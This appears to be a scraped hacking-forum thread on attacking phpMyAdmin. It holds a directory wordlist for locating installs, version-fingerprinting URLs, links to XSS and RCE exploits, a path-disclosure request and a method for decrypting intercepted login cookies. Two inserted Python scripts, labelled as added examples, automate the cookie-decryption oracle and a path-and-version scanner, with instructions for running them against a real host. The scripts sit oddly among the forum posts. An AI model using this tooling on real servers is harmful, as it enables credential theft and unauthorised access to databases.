/phpmyadmin-RELEASE_4_2_13_1/
/phpmyadmin-RELEASE_4_2_13_2/
/phpmyadmin-RELEASE_4_2_6/
/phpmyadmin-RELEASE_4_2_7/
/phpmyadmin-RELEASE_4_2_7_1/
/phpmyadmin-RELEASE_4_2_8/
/phpmyadmin-RELEASE_4_2_8_1/
/phpmyadmin-RELEASE_4_2_9/
/phpmyadmin-RELEASE_4_2_9_1/
/phpmyadmin-RELEASE_4_3_0/
/phpmyadmin-RELEASE_4_3_0ALPHA1/
/phpmyadmin-RELEASE_4_3_0BETA1/
/phpmyadmin-RELEASE_4_3_0RC1/
/phpmyadmin-RELEASE_4_3_0RC2/
/phpmyadmin-RELEASE_4_3_1/
/phpmyadmin-RELEASE_4_3_10/
/phpmyadmin-RELEASE_4_3_11/
/phpmyadmin-RELEASE_4_3_11_1/
/phpmyadmin-RELEASE_4_3_12/
/phpmyadmin-RELEASE_4_3_13/
/phpmyadmin-RELEASE_4_3_2/
/phpmyadmin-RELEASE_4_3_3/
/phpmyadmin-RELEASE_4_3_4/
/phpmyadmin-RELEASE_4_3_5/
/phpmyadmin-RELEASE_4_3_6/
/phpmyadmin-RELEASE_4_3_7/
/phpmyadmin-RELEASE_4_3_8/
/phpmyadmin-RELEASE_4_3_9/
/phpmyadmin-RELEASE_4_4_0ALPHA1/
/phpmyadmin/
/phpmyadmin_/
/phpMyAdmin_/
/phpmyadmin_1/
/phpMyAdmin_1/
/phpMyAdmin1/
/phpmyadmin123/
/phpmyadmin2/
/phpMyAds/
/pma/
/PMA/
/pma1/
/pma2005/
/PMA2005/
/sqlmanager/
/sqlweb/
/web/phpMyAdmin/
/webadmin/
/webdb/
/websql/
phpmyadmin 3.4.8, is there anything for it?
WallHack
20.10.2015, 17:16
↑ (https://antichat.live/posts/3904796/)
phpmyadmin 3.4.8, is there anything for it?
Cross-Site-Scripting (https://packetstormsecurity.com/files/108110/phpMyAdmin-3.4.8-Cross-Site-Scripting.html)
proger_doe
08.02.2016, 03:23
For those who need it: version detection for > 4.x:
http://[target_site]/[pma]/doc/html/index.html
phpMyAdmin up to 4.0.10.14/4.4.15.4/4.5.5.0 server_privileges.lib.php cross site scripting
http://www.scip.ch/en/?vuldb.81135 (http://www.scip.ch/en/?vuldb.81135)
phpMyAdmin up to 4.5.5.0 X.509 Certificate Validation Config.class.php checkHTTP information disclosure
http://www.scip.ch/en/?vuldb.81137 (http://www.scip.ch/en/?vuldb.81137)
phpMyAdmin up to 4.4.15.4/4.5.5.0 cross site scripting [CVE-2016-2561]
http://www.scip.ch/en/?vuldb.81136
Can anyone tell me which XSS that do not require authentication exist for versions from 2.11 onward?
OK, then tell me how to get alert() into the page "http://***.org/phpMyAdmin/error.php?type=ErrorHeader&error=TextForError" if only tags of the following kind can be put into the parameters:
'' => '',
'' => '',
'' => '',
'' => '',
'' => '',
'' => '',
'' => '',
'' => '',
'' => '',
'' => '',
'[*code]' => '',
'[*/code]' => '',
'' => '',
'' => '',
'[br]' => '
',
'[/a]' => '',
'' => '',
'' => '',
full path disclosure
tested on 4.0.8; I can't say in which version it was fixed
http://site.com/myadmin/js/get_scripts.js.php?scripts[][]=123
Warning: explode() expects parameter 2 to be string, array given in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 20
Warning: Invalid argument supplied for foreach() in /var/www/shared_test/myadmin/js/get_scripts.js.php on line 21
^^^house^^^
15.10.2016, 22:27
A question about the exploit for CVE-2016-5734 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5734) https://www.exploit-db.com/exploits/40185/
This exploit is for phpMyAdmin versions 4.3.0 - 4.6.2; the version on my site is 4.0.10.15, which is also vulnerable (just with a different exploit). The vulnerability is present in my version, but unfortunately I can't build an exploit, because the file /tbl_find_replace.php is missing; it did not exist yet in my version.
Please help, maybe someone has run into something similar: which file should I dig into? All that is known is how the bug was fixed in this version, https://github.com/phpmyadmin/phpmyadmin/commit/351019c
Which file specifically pulls in libraries/tbl_columns_definition_form.inc.php, I have no idea
Please advise, I am practically unfamiliar with pma
kacergei
06.09.2017, 05:20
Guys, what is known about
phpMyAdmin PMASA-2017-8 Security Bypass Vulnerability
?
joelblack
22.06.2018, 22:29
phpMyAdmin 4.8.x LFI to RCE (Authorization Required)
http://blog.vulnspy.com/2018/06/21/phpMyAdmin-4-8-x-Authorited-CLI-to-RCE/
Is there anything for version 4.5.1?
Decrypting the login and password in the pmaUser-1 and pmaPass-1 cookies
When the login to phpMyAdmin is done through ISPManager, the server returns the following headers:
Set-Cookie:pmaPass-1=WwazS5W8AMLiKAjA%2FGglKg%3D%3D; path=/phpmyadmin/; httponly
Set-Cookie:pmaUser-1=4LIGuDEVD8XTNAQOvaGeCg%3D%3D; expires=Thu, 07-Apr-2016 17:50:34
You can set these cookies in your own browser and log into phpMyAdmin successfully, but this is inconvenient, since the cookies may expire.
The file responsible for these cookies is at /libraries/auth/cookie.auth.lib.php:
$GLOBALS['PHP_AUTH_PW'] = PMA_blowfish_decrypt($_COOKIE['pmaPass-' . $GLOBALS['server']], PMA_get_blowfish_secret());
The function PMA_get_blowfish_secret() looks for the salt in the phpMyAdmin config.
The same file contains these lines:
if ($GLOBALS['cfg']['LoginCookieRecall'] && !empty($GLOBALS['cfg']['blowfish_secret'])) {
    $default_user = $GLOBALS['PHP_AUTH_USER'];
    $default_server = $GLOBALS['pma_auth_server'];
    $autocomplete = '';
}
And then the output itself:
" size="24" class="textfield"/>
Exploitation algorithm:
1) Intercept the cookies (XSS, memory leak, etc.)
2) Set the pmaUser-1 cookie and refresh the login page a few times; we get the decrypted login
3) Change the value of the pmaUser-1 cookie to the value of the intercepted pmaPass-1 and refresh the login page a few times; we get the decrypted password
The post uses the phpMyAdmin 3.5.0 sources, so it was tested on that version as well. But I think this exists in many versions, if not all. ISPManager 4 Lite acted as the generator.
P.S. I did not find on Google how to decrypt them; apparently the information is not known yet, or it is too obvious. It is hard to call this a vulnerability, since these cookies have to be intercepted first.
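The cookie-swap oracle described in the post above, automated as an added example (this is not code from the post or from phpMyAdmin). It assumes the login form renders the recalled value as `<input name="pma_username" value="...">`, which is the field name in the 3.x cookie auth form; the captured Set-Cookie lines are the ones quoted in the post, and the login-form HTML at the bottom is constructed to stand in for a real server response. The point is the key reuse: both cookies are Blowfish ciphertext under the same blowfish_secret, so a login page that decrypts and echoes pmaUser-N is also a decryption oracle for pmaPass-N.

```python
"""Cookie-swap oracle for phpMyAdmin LoginCookieRecall (added example).

Assumptions not taken from the original post: the recalled username is
emitted as <input name="pma_username" value="...">, and the sample HTML
below is constructed, not captured from a real server.
"""
from html.parser import HTMLParser
from typing import Dict, List, Optional

# Set-Cookie values quoted in the post (captured from an ISPManager login).
SET_COOKIE_LINES = [
    "pmaPass-1=WwazS5W8AMLiKAjA%2FGglKg%3D%3D; path=/phpmyadmin/; httponly",
    "pmaUser-1=4LIGuDEVD8XTNAQOvaGeCg%3D%3D; expires=Thu, 07-Apr-2016 17:50:34",
]


def parse_set_cookies(lines: List[str]) -> Dict[str, str]:
    """Return {name: raw_value} from Set-Cookie header values.

    Values stay URL-encoded exactly as the server sent them: PHP decodes
    $_COOKIE on the way back in, so the raw form is what must be replayed.
    """
    cookies: Dict[str, str] = {}
    for line in lines:
        name_value = line.split(";", 1)[0]
        name, _, value = name_value.partition("=")
        cookies[name.strip()] = value.strip()
    return cookies


def oracle_cookie_header(cookies: Dict[str, str], server: int = 1,
                         reveal: str = "password") -> str:
    """Build the Cookie header for one oracle round.

    reveal="login"    -> replay pmaUser-N unchanged; the form echoes the login.
    reveal="password" -> put the pmaPass-N ciphertext into pmaUser-N; the form
                         decrypts it with the same blowfish_secret and echoes
                         the password in the username field.
    """
    source = f"pmaPass-{server}" if reveal == "password" else f"pmaUser-{server}"
    return f"pmaUser-{server}={cookies[source]}"


class _RecallParser(HTMLParser):
    """Pull the value attribute of the pma_username input out of the login page."""

    def __init__(self) -> None:
        super().__init__()
        self.value: Optional[str] = None

    def handle_starttag(self, tag, attrs) -> None:
        if tag != "input":
            return
        attributes = dict(attrs)
        if attributes.get("name") == "pma_username":
            # HTMLParser already unescapes entities such as &#039; here.
            self.value = attributes.get("value", "")


def extract_recalled_login(html: str) -> Optional[str]:
    """Return the prefilled username (or swapped-in password), if any."""
    parser = _RecallParser()
    parser.feed(html)
    return parser.value


# Constructed login-form fragment representing what a server with
# LoginCookieRecall enabled would return after the swap; not a real capture.
SAMPLE_LOGIN_HTML = """
<form method="post" action="index.php" name="login_form" class="login">
<input type="text" name="pma_username" id="input_username" value="s3cr&#039;t-pw" size="24" class="textfield"/>
<input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield"/>
</form>
"""

if __name__ == "__main__":
    captured = parse_set_cookies(SET_COOKIE_LINES)
    print("round 1 (login):   Cookie:", oracle_cookie_header(captured, reveal="login"))
    print("round 2 (password): Cookie:", oracle_cookie_header(captured, reveal="password"))
    print("recalled field value:", extract_recalled_login(SAMPLE_LOGIN_HTML))
```

Replaying `oracle_cookie_header(...)` as the Cookie header of a GET to the login page and feeding the body to `extract_recalled_login` is the whole attack; the server does the Blowfish work. The defensive takeaway is the same as the post's: treat pmaPass-N as password-equivalent, keep LoginCookieRecall off where the blowfish_secret is shared between hosts, and never let an auth cookie be decrypted into a page.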
What can this base be brute-forced with? And how do I change the path to phpmyadmin, so that, for example, this list doesn't catch it?
↑ (https://antichat.live/posts/3859353/)
I recently made myself a wordlist for searching. Maybe it will be useful to someone.
/_phpMyAdmin/
/admin/
/admin/mysql/
/admin/phpmyadmin/
/....................
........
/phpmyadmin-RELEASE_3_4_10_1/
/phpmyadmin-RELEASE_3_4_10_2/
/............
↑ (https://antichat.live/posts/4322094/)
and how do I change the path to phpmyadmin?
for example on Debian https://www.digitalocean.com/community/tutorials/how-to-install-and-secure-phpmyadmin-on-debian-9
on other OSes the principle is the same: find the config and change the alias, add basic-auth to the folder via .htaccess, and rename the folder itself as you like, for example pma007_MBDSS82347823sdhjsd, and that's it
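The two halves of the thread above (brute-forcing the base path with the wordlist, and the > 4.x version check via /doc/html/index.html) combined into one scanner, as an added example that is not from any poster or from phpMyAdmin. It assumes that the installed manual's `<title>` contains "phpMyAdmin X.Y.Z", and that a login page can be recognised by the string "phpMyAdmin" or a `pma_username` field; both are assumptions. The fetcher is pluggable so the whole thing runs offline against the constructed `FAKE_SITE` below, and `urllib_fetcher` is the drop-in for real use.

```python
"""phpMyAdmin path discovery and version fingerprint (added example).

Assumptions (not from the thread): the manual's <title> carries
"phpMyAdmin X.Y.Z"; a login page contains "phpMyAdmin" or a
pma_username input. FAKE_SITE is constructed test data.
"""
import re
import urllib.error
import urllib.request
from typing import Callable, Dict, List, Optional, Tuple

# A few entries from the wordlist posted above; extend from the full list.
WORDLIST = ["/_phpMyAdmin/", "/admin/", "/admin/mysql/", "/admin/phpmyadmin/",
            "/phpmyadmin/", "/phpMyAdmin/", "/pma/", "/PMA/", "/websql/"]

# Documentation entry points: 4.x ships Sphinx HTML under doc/html/,
# 3.x and older ship Documentation.html (assumed locations).
DOC_FILES = ["doc/html/index.html", "Documentation.html"]

TITLE_RE = re.compile(r"<title>(.*?)</title>", re.I | re.S)
VERSION_RE = re.compile(r"phpMyAdmin\s+(\d+(?:\.\d+){1,3})")

Fetcher = Callable[[str], Tuple[int, str]]  # url -> (status, body)


def looks_like_pma(body: str) -> bool:
    """Cheap content check so a catch-all 200 page is not counted as a hit."""
    return "phpMyAdmin" in body or 'name="pma_username"' in body


def fingerprint_version(base: str, path: str, fetch: Fetcher) -> Optional[str]:
    """Return the version string from the first documentation file that exists."""
    for doc in DOC_FILES:
        status, body = fetch(base + path.rstrip("/") + "/" + doc)
        if status != 200:
            continue
        title = TITLE_RE.search(body)
        match = VERSION_RE.search(title.group(1) if title else body)
        if match:
            return match.group(1)
    return None


def discover(base: str, paths: List[str], fetch: Fetcher) -> Dict[str, Optional[str]]:
    """Probe every wordlist path; map each confirmed install to its version (or None)."""
    found: Dict[str, Optional[str]] = {}
    for path in paths:
        status, body = fetch(base + path)
        if status == 200 and looks_like_pma(body):
            found[path] = fingerprint_version(base, path, fetch)
    return found


def make_fake_fetcher(site: Dict[str, Tuple[int, str]]) -> Fetcher:
    """Offline fetcher backed by a dict of url -> (status, body)."""
    return lambda url: site.get(url, (404, ""))


def urllib_fetcher(url: str) -> Tuple[int, str]:
    """Real fetcher for field use; errors map to a non-200 status."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as exc:
        return exc.code, ""
    except urllib.error.URLError:
        return 0, ""


# Constructed responses: a real install under /pma/, a 200 decoy under /admin/.
FAKE_SITE = {
    "http://target.example/pma/": (200, '<title>phpMyAdmin</title><input type="text" name="pma_username">'),
    "http://target.example/pma/doc/html/index.html": (
        200, "<title>Welcome to phpMyAdmin&#39;s documentation! &mdash; phpMyAdmin 4.0.10.15 documentation</title>"),
    "http://target.example/admin/": (200, "<h1>Site admin</h1>"),
}

if __name__ == "__main__":
    for path, version in discover("http://target.example", WORDLIST, make_fake_fetcher(FAKE_SITE)).items():
        print(path, version or "version unknown")
```

Swap `make_fake_fetcher(FAKE_SITE)` for `urllib_fetcher` and the base URL for the real host to run it against a target; a site that answers 200 for everything will not produce false hits because `looks_like_pma` must also pass, which is the check the bare wordlist lacks. The same script doubles as a self-check after renaming the alias as suggested above: an empty result for the default names is the expected outcome.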
Kerchikn2
01.11.2020, 20:59
Interesting thread, thanks, I have been looking for something like this for a long time